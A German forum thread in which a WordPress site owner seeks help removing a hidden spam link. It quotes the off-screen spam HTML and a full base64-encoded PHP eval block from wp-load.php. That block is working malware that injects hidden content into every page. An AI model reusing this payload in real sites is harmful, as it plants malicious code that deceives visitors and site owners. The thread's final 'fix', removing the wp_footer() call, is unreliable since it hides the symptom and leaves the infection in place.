Hilfe seltsamer Spam Link unauffindbar

  • Hi, da ich nun leider mit meinem Latein am Ende bin, bitte ich um Hilfe. Es geht um folgendes:

    Auf dieser Seite:

    http://www.caspar-coaching.de/wordpress/impressum/

    hat sich oben rechts im Header ein Spam Link eingenistet.

    Ich habe das ganze mit Firebug untersucht und folgenen Code Abschnitt ausfündig gemacht, der sich im Footer eingenistet hat:

    HTML
    <div style="position:absolute; left:1044px; top: -2000px;"><a href="http://2010jewelball.com/index.php?post=tylenol">tylenol generic</a> tylenol generic</div>

    Ich habe mir nun die komplette Wordpress Installation herunter geladen und sämtliche Dateien (1100) mit Hilfe von Dreamweaver nach diesem Code-Segment durchsucht: Ergebnis: unauffindbar!

    Dann habe ich verschiedene Themes installiert und probeweise aktiviert, der Spam Link bleibt erhalten... Aber irgendwo muss sich dieser Link doch eingenistet haben... ich verstehe das einfach nicht :shock:

    Dann ist mir noch etwas seltsames aufgefallen: Immer wenn ich eingelggt bin und die ADMIN BAR aktiv ist, ist der Spam Link nicht mehr zu sehen. Sobald die Admin Bar ausgeblendet ist (z.B. im ausgeloggten Zustand), ist der Spam Link zu sehen.

    Es handelt sich um die aktuelle WP Version.

    Hatte jemand schon mal so ein Problem? :confused: Bitte um Hilfe

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Da hast du aber Glück, dass du ihn überhaupt gefunden hast, wenn alles so klappen würde, wie vom Spammer gewollt, wäre der für normale Nutzer gar nicht sichtbar...

    Wenn du deine Dateien bereits durchsucht hast, bleiben nur noch Plugins und Datenbank. Am Besten, du deaktivierst ein Plugin nach dem anderen, wenn der Code über ein Plugin ausgeführt wird, sollte er dann irgendwann verschwinden.
    Wenn auch das ergebnislos bleibt, musst du die Datenbank durchsuchen. Das geht über das vermutlich auch dir zugängliche Tool phpmyadmin sehr einfach. Wenn du nicht weißt, was ich meine, frage mal bei deinem Hoster danach ;)

    Übrigens: Es muss nicht unbedingt dieser Code irgendwo stehen. Eventuell ist der Schadcode auch als codierter Block irgendwo drin.
    Noch ein Tipp: Probier zuerst mal aus, ob dir das Plugin "AntiVirus" von Sergej Müller hilft. Es durchsucht deine Template-Dateien nach Schadcode.

  • Vielen Dank schonmal für eure Hilfe, ich habe in den Dateien mal nach "base64" un "rot13" gesucht, bei "rot13" keine Treffer und bei "base64" kamen viele Treffer (54 Treffer in 1106 Dateien). Woher weiss ich nun, welches Schadcode ist und welches nicht :/

    Verdächtig kam mir folgender Treffer in der WP_Load.php vor:

    PHP
    <? eval(base64_decode("aWYgKCFmdW5jdGlvbl9leGlzdHMoJ19fZ29vZ2xlX2FuYWx5dGljc19vYmgnKSl7CmZ1bmN0aW9uIF9fZ29vZ2xlX2FuYWx5dGljc19vYmggKCRjKXsKICAgICRpID0gQGluY2x1ZGUgJ3dwLWluY2x1ZGVzL2ltYWdlcy9zbWlsaWVzL2NsYXNzLnBocCc7CiAgICAkaSA9ICc8ZGl2IHN0eWxlPSJwb3NpdGlvbjphYnNvbHV0ZTsgbGVmdDoxMDQ0cHg7IHRvcDogLTIwMDBweDsiPicgLiAkaSAuICc8L2Rpdj4nOwogICAgJHRtcGRpciA9ICd3cC1pbmNsdWRlcy9pbWFnZXMvd2x3Lyc7CiAgICAkcGdpZCA9IEAkX1NFUlZFUlsnUkVRVUVTVF9VUkknXTsKICAgIGlmIChlbXB0eSgkcGdpZCkpICRwZ2lkID0gX19GSUxFX187CiAgICAkZiA9ICR0bXBkaXIubWQ1KCc0MjopJy4kcGdpZCk7CiAgICBpZiAoIWZpbGVfZXhpc3RzKCRmKSkKICAgIHsKICAgICAgICAkcG9zID0gbXRfcmFuZCgwLCAxMCkgLyAxMDsKICAgICAgICBmaWxlX3B1dF9jb250ZW50cygkZiwgJHBvcyk7CiAgICB9CiAgICBlbHNlICRwb3MgPSBmaWxlX2dldF9jb250ZW50cygkZik7CiAgICAkYzIgPSBzdHJ0b2xvd2VyKCRjKTsKICAgICR0YWdzID0gYXJyYXkoJzwvcD4nLCAnPC9kaXY+JywgJzwvdGFibGU+Jyk7CiAgICAkaW5qcG9zID0gc3RycG9zKCRjMiwgJzwvYm9keT4nKSBvciBzdHJsZW4oJGMpOwogICAgJHAgPSByb3VuZCgkaW5qcG9zICogJHBvcyk7CiAgICBpZiAoJHAgPCAwKSAkcCA9IDA7IGlmICgkcCA+ICRpbmpwb3MpICRwID0gJGluanBvczsKICAgIGZvcmVhY2ggKCR0YWdzIGFzICR0YWcpIHsKICAgICAgICAkdCA9IHN0cnBvcygkYzIsICR0YWcsICRwKTsKICAgICAgICBpZiAoJHQpCiAgICAgICAgewogICAgICAgICAgICAkaW5qcG9zID0gJHQgKyBzdHJsZW4oJHRhZyk7CiAgICAgICAgICAgIGJyZWFrOwogICAgICAgIH0KICAgIH0KICAgIHJldHVybiBzdWJzdHIoJGMsIDAsICRpbmpwb3MpIC4gJGkgLiBzdWJzdHIoJGMsICRpbmpwb3MpOwogICAgfQogICAgQG9iX3N0YXJ0KF9fZ29vZ2xlX2FuYWx5dGljc19vYmgpOwp9")); ?>

    Ansonsten werd ich mal die Wordpress Installation lokal mit XAMP installieren und testen, melde mich dann wieder :)

  • Was du da gepostet hast, decodiert den Quellcode schon. Wenn du also alle diese Schnipsel per PHP ausführst, kommt der entschlüsselte Quellcode raus.

    Wenn das so oft vorkommt, scheinst du aber ein größeres Problem zu haben: Die Sicherheit. Irgendwo wurde deine Installation verseucht und du musst herausfinden, über welchen Weg. Jedenfalls ist sie nicht mehr sicher und könnte eine Gefahr für die Seitenbesucher darstellen.

  • Hi, ich hab nun den wordpress blog lokal mit xamp installiert und siehe da, kein Spam Link im Code!

    Das bedeutet nun, dass die Datenbank infiziert ist?

    Ich hab auch alle Plugins mal deaktiviert, kein Effekt. Dann habe ich mal das AntiVir Plugin von Segej Müller installiert und laufen lassen, keinerlei Warnmeldung.

    Ich hab mich nun mal ein bisschen in phpmyadmin umgeschaut, jedoch fällt mir nichts besonderes auf. Das einzige was mir jetzt beim durchsuchen der Tabellen auffiel war in der Tabelle wp_options eine option_id 33 mit dem option_name "hack_file". wenn ich diese bearbeite, steht jedoch nichts drin. Nach was müsste ich dort denn suchen?
    Ist dieser Eintrag normal? Vielen Dank

  • Hm, Hack steht ja nicht nur für böse Dinge, das könnte sogar von einem Plugin stammen.

    Hast du jetzt dein Blog, so wie es ist gespiegelt? Inklusive Datenbank? Das wäre mal interessant. Wenn du nämlich alle Daten vom Hoster mit der Datenbank, die dort gerade läuft lokal untersuchst und keinen Spam drin hast, ist dein Hoster wohl infiziert worden...

  • ja also ich hab einen datenbank dump gemacht und die komplette wordpress website + datenbank dump lokal auf meinem rechner mit xamp installiert. Ergebnis war, dass kein Spam Link erschienen ist. Ich habe nun Goneo dieses Problem geschildert und sie gebeten, sich darum zu kümmern, da ich leider kein phpmyadmin / php profi bin. Mal gespannt was sie antworten werden.

  • Ich habe die Ursache herausgefunden:

    Und zwar habe ich folgenden Code-Schnipsel entfernt:

    PHP
    <?php wp_footer(); ?>

    Und siehe da, kein Spam Link mehr!

    Ist wp_footer eine php Datei? ich habe im Wordpress Ordner keinerlei Datei finden können die wp_footer heisst. Falls solch eine doch existiert, wo befindet sich diese?
    dankeeeee :)

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!